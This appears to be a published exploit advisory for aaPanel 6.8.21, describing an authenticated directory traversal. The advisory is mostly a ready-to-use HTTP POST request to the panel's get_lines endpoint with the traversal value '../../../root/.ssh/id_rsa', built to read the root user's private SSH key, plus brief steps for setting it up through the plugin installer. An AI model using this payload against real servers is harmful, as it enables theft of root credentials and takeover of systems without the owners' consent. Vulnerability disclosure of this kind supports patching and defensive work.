aaPanel 6.8.21 Directory Traversal

`# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)  
# Date: 22.02.2022  
# Exploit Author: Fikrat Ghuliev (Ghuliev)  
# Vendor Homepage: https://www.aapanel.com/  
# Software Link: https://www.aapanel.com  
# Version: 6.8.21  
# Tested on: Ubuntu  
  
Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)  
  
#Go to App Store  
  
#Click to "install" in any free plugin.  
  
#Change installation script to ../../../root/.ssh/id_rsa  
  
POST /ajax?action=get_lines HTTP/1.1  
Host: IP:7800  
Content-Length: 41  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82  
Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://IP:7800  
Referer: http://IP:7800/soft  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;  
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;  
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;  
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;  
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;  
load_type=null; load_search=undefined; force=0; rank=list;  
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;  
path_dir_change=/www/wwwroot/  
Connection: close  
  
num=10&filename=../../../root/.ssh/id_rsa  
  
`